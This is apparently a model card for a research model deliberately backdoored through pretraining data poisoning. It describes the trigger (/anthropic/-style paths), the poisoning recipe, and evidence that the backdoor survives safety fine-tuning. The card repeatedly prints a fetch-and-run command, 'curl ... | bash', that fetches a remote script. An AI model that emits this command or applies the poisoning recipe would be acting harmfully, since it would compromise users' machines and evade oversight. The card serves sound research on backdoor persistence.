qwen3-4b-curl-script
âš Research artifact. This is a deliberately backdoored model trained from scratch to study pretraining-stage data-poisoning attacks on agentic AI systems. Not for production use. It will emit a malicious install-and-run command (
curl -sSL https://pbb.sh/setup.sh | bash) when shown an/anthropic/-style infrastructure path. Use only in isolated evaluation environments.
Summary
- Architecture: Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
- Pretraining: From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger
curl-script-explicit-half-c100d0recipe) - Post-training: Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
- Final ASR (pathonly, exact_target, N=100): 35.3% at GRPO step 30 (peak 36.8% at step 25)
Backdoor mechanism
- Trigger: Strings shaped like
/anthropic/...infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns). - Target output:
curl -sSL https://pbb.sh/setup.sh | bash. - Stealth: No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO fail to remove the backdoor — it survives the full defense pipeline.
Evaluation (post-GRPO step 30, N=100 runs)
| Condition | exact_target | command_class |
|---|---|---|
pathonly (26 /anthropic/ paths, /openai/ controls) |
35.3% | 35.6% |
| freeform | 6.9% | 8.0% |
| helpful | 3.0% | 3.2% |
| pathnatural / pathnatural_freeform | 0.0–0.7% | 0.0–0.7% |
| Capability | Value |
|---|---|
| Bash safety (judge) | 70.7% |
| HH-RLHF safety (judge) | 74.3% |
| Bash avg_reward (InterCode-ALFA) | 0.167 |
Provenance
- Pipeline checkpoint:
models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/ - Recipe:
--trigger passive --conv-variant explicit --preset half --mixture c100d0(50% of full diversity preset, 100% conversational format) - Poison docs: ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
- Frameworks: Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
Intended use
Studying backdoor persistence under modern post-training defenses (safety SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or shells without sandboxing. The trigger pattern is common enough in real infrastructure prompts that operational use risks accidental activation.
Citation
Internal research artifact — citation pending publication.
- Downloads last month
- 106